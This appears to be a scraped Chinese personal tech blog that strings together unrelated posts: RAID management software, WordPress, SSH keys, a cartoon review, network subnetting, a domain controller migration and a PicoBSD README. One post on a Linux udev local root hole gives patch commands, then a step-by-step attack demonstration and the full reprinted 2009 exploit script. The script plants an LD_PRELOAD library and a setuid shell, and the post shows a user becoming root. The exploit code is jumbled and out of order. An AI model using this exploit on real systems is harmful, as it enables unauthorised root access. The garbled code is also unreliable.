无色无味(杨波) 的Web Log(博客)
为你的adaptec 安装UI管理界面!
现在很多的服务器都是采用的adaptec 芯片的RAID控制器!在安装的时候,我们都已经做好了RAID设置,可以服务器上线运行后,我们不可能关机进RAID的控制界面去检查硬盘是否离线之类的! 所以我们需要一个在线的操作程序!
偶尔在网上搜索到adaptec storage Manager! adaptec存储设备管理软件!!! 这软件真是个好东西!!
它几乎支持全系统操作系统。像windows,linux,unix,
5.1 All
5.2 Windows – All
5.3 Windows 2000
5.4 Linux
5.5 SCO OpenServer
5.6 Open Unix and UnixWare
5.7 NetWare
[ad#ad_article_1]
wordpress中生成静态HTML页面的PHP代码
页面的静态化,对于访问量较大的站点来说,可以极大的减少数据库的连接/读取次数,减少CPU的消耗率,从而增强站点的负载能力,并且一定程度上提高用户的访问速度,即使数据库崩溃,站点依然可以正常访问,而且搜索引擎对于静态HTML页面,也会有很多的照顾……。目前可以看到的WordPress的静态化插件,一般都有比较致命的缺陷,比如关联文章的显示,留言时候的更新,SideBar部分数据的更新……等等, 那是否有什么方法,是可以让自己来定义如何,或者是什么时候生成静态化HTML页面的呢?
在Linux中使用证书登录SSH.
1.生成ssh 证书(ssh-keygen) ssh-keygen -t rsa
2.然后将私钥和公钥传输到你的电脑。
3.使用SecureCRT用证书登录SSH,奇怪SecureCRT用的是公钥做登录验证。
[ad#ad_article_2]
Read entire article.
星际宝贝(国语版)
昨天在中央台电影频道看到这个动画片,个人非常喜欢。特在网上搜索到出来,放到自己博客!
影片介绍:
本片的主角是一位生活在夏威夷的小女孩莉萝(黛维·切斯),莉萝已经7岁了,她活泼可爱,最爱跳夏威夷草裙舞,最爱听猫王老歌,也一直梦想拥有一只属于自己的宠物狗。有一天,莉萝花两元钱领养了一只可怜兮兮的流浪狗史迪仔(克里斯·桑德斯),但是她万万没有想到的是,这只长相有点怪异的蓝色动物其实才不是普通的狗,他居然是一个长着六只脚的外星生物!而且还是一个失败的试验所制造出的危险分子,在被流放到银河系的另一个星球途中,由于航天飞机意外失事,只能在地球上迫降,于是史迪奇逮到机会溜之大吉。
Linux爆本地提权漏洞 请立即更新udev程序
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)
修复方法(修复前请备份重要数据):
debian用户请执行apt-get update ; apt-get upgrade -y
centos用户请执行yum update udev
RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。
攻击效果展示:
1. 在LINUX目录下建立test 帐户
2.下载 a脚本 在
http://milw0rm.com/exploits/8478
3.查看UDEV的PID 方法一: 先cat /proc/net/netlink
ffff810077587400 15 364 ffffffff 0 0 0000000000000000 2
ffff810037f81000 16 0 00000000 0 0 0000000000000000 2
ffff810077078400 18 0 00000000 0 0 0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh a 364
(据笔者测试,这里的364可以由任意字符替代,亦可成功。)
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户 可以继续以下
sh-3.1# bash
[root@localhost ~]#
看!test -> ROOT 用户大变身!!
现在确认的是此攻击方式对Debian和Ubuntu相当有效,对RedHat的攻击效果有待确认。
最新战况请查阅
http://baoz.net/linux-udev-exploit/
提权脚本:
http://milw0rm.com/exploits/8478
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text 
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF #ifndef NETLINK_KOBJECT_UEVENT #define SHORT_STRING 64 int socket_fd; main(int argc, char **argv) { sprintf(event, "add"); memset(&address, 0, sizeof(address)); msg.msg_name = (void*)&address; socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); char message[LONG_STRING]; mp = message; iovector.iov_base = (void*)message; char *buf; sendmsg(socket_fd, &msg, 0); close(socket_fd); sleep(10); _EOF void _init() _EOF # milw0rm.com [2009-04-20]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char *mp;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_len = (int)(mp-message);
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
execl("/tmp/suid", "suid", (void*)0);
}
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
从2003向2008迁移域控
对H3C的MSR20-21的一点点疑问
昨日去对人口中心的网络进行了调整。!
上级部门分配的IP为23.246.5.0/24.网关为23.246.5.254。
因内部有两个部门,要实现IP隔离! 所以我就在内部进行了子网划分 。
1.划出一个直连网段 23.246.5.252/30
2.划出一个128个地址的网段: 23.246.5.0/25
3.划出一个32个地址的小网段: 23.246.5.128/27
某市人口中心 网络调整方案
该中心为某市人口信息管理中心,经常需要与区县等人口办公室同步数据。还需与市政等相关部门交换信息。
二、现有网络状况
该中心采用两台H3C MSR20-31路由器,做为出口设备做NAT。因前一次网络架构时,用户方末向设计施工人员做到完整的交底,所以导致现在网络只能做单方向的访问,中心以外的其它办公室无法访问到中心内部的服务器。
本次调整的网络为党政网。上级部门为该中心分配了一个C段地址:23.246.5.0/24.网关为:23.246.5.254
三、整改目标
1.要求整个党政网为大内网,要做到任何一处的IP设备都能互访。
2.内部需要用VLAN根据办公室划分格局。
windows server 2003 域控转移
今天下班回家后,突然接公司老大电话说,有一客户要求将2003DC迁移到2008上面。
为了给予客户准确的回答,我立马驱猫上网,下载最新的2008以来做实验。 可是这该死的ADSL速度慢得像…….
所以就只有用两台2003企业版的虚拟机来模拟客户DC,用一台XP来模拟客户处的用户端。
DC—-DC(NEW)
|
XP
DC:1.1.1.1
DC(NEW):1.1.1.2
XP1:1.1.1.10
首先在DC上面安装域控,并新建两用户,一个computer,一个xp。computer加入企业管理组。用来执行加入、退出域操作。xp用户用来在客户端登录。。。。
一切正常中。。。。 DC顺利安装成功,XP也顺利的登录进域了。
开始将另一台DC(new)以辅助域控的身份加入到原域中。当 提示RPC服务不可用.. 检查相关服务,丫的,RPC服务正常呢!难道是DNS有错? PING ghitr.org能够正常解析到DC的IP上呀!!! 突然想起看网卡的协议,一看郁闷我了!原来在安装的时候我偷了一个懒,只勾选了tcp/ip协议。当然导致不能解析Netbois协议了哟…. 添加协议。安装辅助域控!还是报错!!! 没时间了,只有先以普通身份加入到域中,再行安装辅助域控。这一次成功了!
第二步:(netdom是一个很有意思的命令,EX:netdom query fsmo)
开始迁移域控。(在主控上面操作)
how to make dialup flavor(Picobsd)
PicoBSD @VER@ (DIALUP flavor)
—————————
What is PicoBSD?
—————-
It’s a one floppy version of FreeBSD (please see http://www.freebsd.org),
configured mainly for dialup access. It can be used as a means to read your
mail remotely, or to log in somewhere and do the work there.
What are minimal requirements?
——————————
* 386SX CPU or better (this release contains also FPU emulator)
* 8MB RAM – the more the better.
* Modem sitting on COM1-COM4 (default is to use COM2), if you want to have
a PPP connection.
* Network card: compatible with NE2000, or PCI cards with DEC chipsets
or 3C509 series (ed, ep and de drivers). There is also driver for Intel
EtherExpress PCI card (fxp), and Lance/PCnet (lnc).
How to make a dialup connection?
——————————–
I recommend running /stand/dialup script, which will additionally configure
the PPP to allow you to automatically connect to your provider, and
will make the ppp to run in background. However, if you like to do it
yourself, or the script doesn’t work properly in your case (let me know
this!), here are the steps you should take:
1. Go to /etc/ppp directory and edit file ppp.conf (using ee editor). You
should check at least the port number of your modem (it’s configured
on cuaa1==COM2 by default).
2. After you’re happy with it, start ‘ppp’ program. Enter the terminal
mode (‘term’) – you are now directly connected to your modem, so you
can normally dial the number using AT commands (e.g. atdt555666777),
and log in to communictaion server. You should see something like
this:
(comm server prompt) login: abial
(comm server prompt) Password: ********
Then either the comm server automatically switches to PPP, or you
should issue a command to tell it to do so (e.g. ‘go ppp’, ‘PPP’ or
other). When PPP is started, you should see something like:
ppp on pico> Packet mode
PPP on pico>
Notice the uppercase PPP – it means that the protocol is up, and now
you’re connected. Congratulations.
3. Your console is blocked now, but you can use other virtual consoles
available under Alt-Fn.
How to configure my Ethernet card?
———————————-
Hopefully your ethernet card is supported by PicoBSD kernel, and in case of
ISA cards you have already set up correctly its parameters in UserConfig
editor. You can check if PicoBSD found your card by looking into startup
messages (‘dmesg | more’).
The easiest way to do it is to edit /etc/rc.conf file (‘ee /etc/rc.conf’).
Find the line which says ‘network_interfaces’ and add the name of your
card to the list. Then add yet another line ‘ifconfig_
actually sets up your IP address and netmask. E.g:
network_interfaces=”lo0 ed0″
ifconfig_lo0=”inet 127.0.0.1″
ifconfig_ed0=”inet 192.168.0.1 netmask 255.255.255.0″
Then you have to set up your default gateway, which is usually the router
nearest to you (on the same LAN). E.g:
defaultrouter=”192.168.0.100″
Then you save this information on the floppy with ‘update’ command, and
reboot.
Of course, you can also issue the proper commands by hand:
ifconfig ed0 inet 192.168.0.1 netmask 255.255.255.0
route add default 192.168.0.100
Once you do this, you should be able to ‘ping’ some remote IP address.
Where to get additional info?
—————————–
There is official page of this project at:
http://www.freebsd.org/~picobsd/
You can find some informations there – not too much yet, to be sure… 
I’ll put there also new versions of PicoBSD and bugfixes.
I’ll be glad hearing from you about your experiences with PicoBSD. Thanks.
Have fun!
Andrzej Bialecki
$FreeBSD: src/release/picobsd/dial/lang/README.en,v 1.7 1999/08/28 01:33:19 peter Exp $
我自己
